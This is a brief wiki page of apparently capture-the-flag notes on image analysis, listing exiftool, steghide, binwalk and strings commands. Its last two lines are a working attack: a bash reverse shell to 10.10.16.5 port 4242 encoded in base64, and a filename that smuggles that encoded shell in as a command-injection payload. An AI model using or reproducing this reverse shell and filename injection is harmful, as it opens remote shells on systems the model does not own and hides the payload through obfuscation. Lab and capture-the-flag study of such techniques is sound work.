-
Notifications
You must be signed in to change notification settings - Fork 14
Image Mega
Alvin Smith edited this page Sep 12, 2021
·
2 revisions
exiftool *.jpg
steghide extract -sf *.jpg
binwalk -h
binwalk might need additional dependency http://www.infotinks.com/binwalk-tutorial/
strings
echo -n "bash -c 'bash -i >& /dev/tcp/10.10.16.5/4242 0>&1'" | base64
touch 'shell.jpg; `echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi41LzQyNDIgMD4mMSc= | base64 -d | bash `;'